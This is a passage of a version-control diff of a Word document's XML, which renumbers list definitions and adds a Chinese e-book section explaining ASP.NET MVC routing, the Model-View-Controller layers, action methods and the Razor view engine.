       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -58808,10 +62883,10 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="115">
-    <w:abstractNumId w:val="47"/>
+    <w:abstractNumId w:val="48"/>
   </w:num>
   <w:num w:numId="116">
-    <w:abstractNumId w:val="47"/>
+    <w:abstractNumId w:val="48"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -58841,7 +62916,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="117">
-    <w:abstractNumId w:val="47"/>
+    <w:abstractNumId w:val="48"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -58871,7 +62946,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="118">
-    <w:abstractNumId w:val="47"/>
+    <w:abstractNumId w:val="48"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -58901,7 +62976,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="119">
-    <w:abstractNumId w:val="47"/>
+    <w:abstractNumId w:val="48"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -58931,7 +63006,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="120">
-    <w:abstractNumId w:val="47"/>
+    <w:abstractNumId w:val="48"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -58961,7 +63036,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="121">
-    <w:abstractNumId w:val="47"/>
+    <w:abstractNumId w:val="48"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -58991,7 +63066,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="122">
-    <w:abstractNumId w:val="47"/>
+    <w:abstractNumId w:val="48"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -59021,7 +63096,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="123">
-    <w:abstractNumId w:val="47"/>
+    <w:abstractNumId w:val="48"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -59051,7 +63126,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="124">
-    <w:abstractNumId w:val="47"/>
+    <w:abstractNumId w:val="48"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -59516,10 +63591,10 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="144">
-    <w:abstractNumId w:val="43"/>
+    <w:abstractNumId w:val="44"/>
   </w:num>
   <w:num w:numId="145">
-    <w:abstractNumId w:val="43"/>
+    <w:abstractNumId w:val="44"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -59858,28 +63933,28 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="159">
-    <w:abstractNumId w:val="55"/>
+    <w:abstractNumId w:val="56"/>
   </w:num>
   <w:num w:numId="160">
     <w:abstractNumId w:val="35"/>
   </w:num>
   <w:num w:numId="161">
-    <w:abstractNumId w:val="51"/>
+    <w:abstractNumId w:val="52"/>
   </w:num>
   <w:num w:numId="162">
-    <w:abstractNumId w:val="56"/>
+    <w:abstractNumId w:val="57"/>
   </w:num>
   <w:num w:numId="163">
-    <w:abstractNumId w:val="48"/>
+    <w:abstractNumId w:val="49"/>
   </w:num>
   <w:num w:numId="164">
+    <w:abstractNumId w:val="46"/>
+  </w:num>
+  <w:num w:numId="165">
     <w:abstractNumId w:val="45"/>
   </w:num>
-  <w:num w:numId="165">
-    <w:abstractNumId w:val="44"/>
-  </w:num>
   <w:num w:numId="166">
-    <w:abstractNumId w:val="46"/>
+    <w:abstractNumId w:val="47"/>
   </w:num>
   <w:num w:numId="167">
     <w:abstractNumId w:val="31"/>
@@ -59894,16 +63969,19 @@
     <w:abstractNumId w:val="25"/>
   </w:num>
   <w:num w:numId="171">
+    <w:abstractNumId w:val="55"/>
+  </w:num>
+  <w:num w:numId="172">
     <w:abstractNumId w:val="54"/>
   </w:num>
-  <w:num w:numId="172">
-    <w:abstractNumId w:val="53"/>
-  </w:num>
   <w:num w:numId="173">
-    <w:abstractNumId w:val="49"/>
+    <w:abstractNumId w:val="50"/>
   </w:num>
   <w:num w:numId="174">
     <w:abstractNumId w:val="34"/>
+  </w:num>
+  <w:num w:numId="175">
+    <w:abstractNumId w:val="42"/>
   </w:num>
   <w:numIdMacAtCleanup w:val="172"/>
 </w:numbering>
@@ -60120,7 +64198,6 @@
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="a1">
@@ -60783,7 +64860,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F2AAA371-468C-4CBD-A058-5113E20C4908}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{7CB407D4-A842-4978-B71D-C122D65B6373}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/EBook/C#技术栈.docx
+++ b/EBook/C#技术栈.docx
@@ -12037,17 +12037,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:ind w:left="90"/>
-        <w:rPr>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="10"/>
-        <w:ind w:left="90"/>
         <w:rPr>
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
@@ -12081,30 +12070,568 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>对于传统的ASP.NET WebForms应用来说，用户请求总是指向某个具体的物理文件，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>目标文件的路径决定了访问请求的URL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>。但是对于ASP.NET MVC应用来说，来自浏览器的请求总是来自某个Controller中的某个Action，请求URL与目标Controller/Action之间的映射是通过“路由”来实现的。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>理解MVC模式</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>MVC</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>模式意味着一个</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>MVC</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>应用至少将被分离成</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>个层次：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="177"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>模型</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>(Model)：含有或表现用户进行操作的数据。模型可以是简单的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>视图模型</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>(View Model)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>，它们只用来传递控制器和视图之间的数据；也可以是</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>域模型</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>(Domain Model)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>，它包含业务领域的数据，以及处理这些数据的操作，转换和规则。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="177"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>视图</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>(View)：用于将模型的某些部分渲染成用户界面。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="177"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>控制器</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>(Controller)：处理传入的请求，执行模型上的操作，并选择渲染给用户的视图。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>域模型</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>往往是一组C#类型(类或结构等)，统称为</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>域类型</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>域中的操作由域类型中定义的方法来实现，而域规则表示成这些方法的逻辑。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>域模型通常是持久化的，且一直处于活动状态。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>域模型是应用程序中业务数据及其处理的唯一和权威定义</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>，我们常常把与模型放在一个单独的程序集中，这样应用程序的其他部分也可以创建对与模型的引用。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>在MVC中，控制器是C#类，通常派生于System.Web.Mvc.Controller类。从这个Controller派生而来的类中，每一个public方法都统称为</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>动作方法</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>(Action Method)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>。这个方法通过ASP.NET的路由系统与一个可配置的URL相关联。当一个请求被发送给与一个动作方法相关联的URL时，便会执行控制器类中的语句，以进行域模型上的一些操作，然后选择一个视图显示给客户端。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:firstLine="420"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:b/>
+          <w:noProof/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="6026150" cy="1491800"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="30" name="图片 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13" cstate="print"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6038691" cy="1494905"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:firstLine="420"/>
+        <w:jc w:val="left"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>对于传统的ASP.NET WebForms应用来说，用户请求总是指向某个具体的物理文件，</w:t>
+          <w:b/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>ASP.NET MVC</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>框架使用的</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>目标文件的路径决定了访问请求的URL</w:t>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>视图引擎</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>。但是对于ASP.NET MVC应用来说，来自浏览器的请求总是来自某个Controller中的某个Action，请求URL与目标Controller/Action之间的映射是通过“路由”来实现的。</w:t>
+          <w:b/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>，该引擎负责处理视图的组件，以便为浏览器生成响应。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>MVC</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>早期使用的是</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ASP.NET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>视图引擎，它用改进的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>WebForm</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>标记来处理</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ASPX</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>页面，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>MVC 3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>引入了</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Razor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>视图引擎。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12796,7 +13323,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>ChildActionOnlyAttribute</w:t>
       </w:r>
     </w:p>
@@ -13344,6 +13870,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>数据库分库、拆表、分布式、集群、备份、故障调控等方案</w:t>
       </w:r>
     </w:p>
@@ -14200,7 +14727,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>数据库辅助工具：</w:t>
       </w:r>
       <w:r>
@@ -14381,6 +14907,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="2768012"/>
@@ -14399,7 +14926,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
